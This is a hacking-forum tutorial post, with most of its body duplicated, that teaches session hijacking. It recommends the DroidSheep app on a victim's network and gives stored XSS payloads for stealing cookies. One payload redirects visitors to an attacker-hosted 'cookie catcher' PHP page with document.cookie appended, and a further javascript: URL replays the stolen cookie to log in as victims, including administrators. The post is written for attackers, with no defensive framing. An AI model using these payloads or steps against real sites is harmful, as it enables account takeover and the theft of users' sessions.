Session hijacking via ARP-Spoofing and XSS 01-31-2014, 06:18 PM
#1
Hello! This is my first tutorial so please do not flame me. So I found a cool useful tool to make your life easier if you like session hijacking, and what makes it even cooler is that it is for android phones and tablets(Rooted device is required ).
[Step 1]
So google for droid sheep and look for the apk
![[Image: droid.PNG]](http://1.bp.blogspot.com/-tbwpIW0xuWo/UuvNJCETW3I/AAAAAAAAAMg/nczAHr8NnCA/s1600/droid.PNG)
[Step 2]
Its pretty easy from there, you just download run it and it should install then you should definitely be able to go from there. Also you have to be connected to your victims network to use this.
![[Image: images+(5).jpg]](http://1.bp.blogspot.com/-iqtcD0rtRF8/UuvNuqVFmpI/AAAAAAAAAMo/F6ZyF1gevro/s1600/images+(5).jpg)
XSS Session hijacking
----------------------------------------------------------------------------------------------------------------------------
First you need find something that is vulnerable to XSS(obviously), then you need make sure other people can go to the XSS vulnerable place, this will work in places with something like forums or a comment system.
[Step 1]
So to test the website for the vulnerability put some javascript in the input that will alert a message, to do this post <script>alert('XSS');</script> in the vulnerable input.
![[Image: images+(6).jpg]](http://1.bp.blogspot.com/-HjBzmG41MtE/UuvRJum07II/AAAAAAAAAM0/k9j5pQfGNKg/s1600/images+(6).jpg)
[Step 2]
If you get an alert from the page then it is vulnerable.
![[Image: IC65255.gif]](http://3.bp.blogspot.com/-ysKGAb38G6o/UuvRz3m70DI/AAAAAAAAAM8/S7K_OylG3PA/s1600/IC65255.gif)
[Step 3]
Since the code executed into the website then when people go to the post then the code will run the <script>alert('XSS')</script> and then they get an alert. So now what you want to do is run malicious code that steels there session ID's and sends it too you so you can then open it in and be logged in as them. There is a lot of ways to do this. This is how I usually do it. First you need to go to a free hosting service where you can use php like this free one http://www.110mb.com/. Then upload Cookie Catcher to your website. Download from here http://adf.ly/Tdbm
[Step 4]
Post this in the vulnerable input on victims website <script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script> (make sure to make the location to the website you made)and whenever a user goes to the vulnerable forum there cookies will go to a file in your directory called cookiecatcher.html. Open that and it should have the cookies from the users that have visited.
[Step 5]
To log in go to the vulnerable website and replace the url with this Javascript:void(document.cookie="") (Replace "" with the stolen cookie)and it should go to the session containing that cookie which will have them logged and there you go! Your in and if you get the admins session then you can usually mess with everyones account registered with that website.
I hope it helped, I also used one of @1234hotmaster's post has a reference. Again this is my first tutorial so please do not flame me. Thanks!:Content: Also if anyone has tips, advice, or suggestions on how to write tutorials I would love that
[Step 1]
So google for droid sheep and look for the apk
[Step 2]
Its pretty easy from there, you just download run it and it should install then you should definitely be able to go from there. Also you have to be connected to your victims network to use this.
XSS Session hijacking
----------------------------------------------------------------------------------------------------------------------------
First you need find something that is vulnerable to XSS(obviously), then you need make sure other people can go to the XSS vulnerable place, this will work in places with something like forums or a comment system.
[Step 1]
So to test the website for the vulnerability put some javascript in the input that will alert a message, to do this post <script>alert('XSS');</script> in the vulnerable input.
[Step 2]
If you get an alert from the page then it is vulnerable.
[Step 3]
Since the code executed into the website then when people go to the post then the code will run the <script>alert('XSS')</script> and then they get an alert. So now what you want to do is run malicious code that steels there session ID's and sends it too you so you can then open it in and be logged in as them. There is a lot of ways to do this. This is how I usually do it. First you need to go to a free hosting service where you can use php like this free one http://www.110mb.com/. Then upload Cookie Catcher to your website. Download from here http://adf.ly/Tdbm
[Step 4]
Post this in the vulnerable input on victims website <script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script> (make sure to make the location to the website you made)and whenever a user goes to the vulnerable forum there cookies will go to a file in your directory called cookiecatcher.html. Open that and it should have the cookies from the users that have visited.
[Step 5]
To log in go to the vulnerable website and replace the url with this Javascript:void(document.cookie="") (Replace "" with the stolen cookie)and it should go to the session containing that cookie which will have them logged and there you go! Your in and if you get the admins session then you can usually mess with everyones account registered with that website.
I hope it helped, I also used one of @1234hotmaster's post has a reference. Again this is my first tutorial so please do not flame me. Thanks!:Content: Also if anyone has tips, advice, or suggestions on how to write tutorials I would love that
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
those are useful and fun. i loooove me some cookies hahaha but as you said bruhh...just a thought 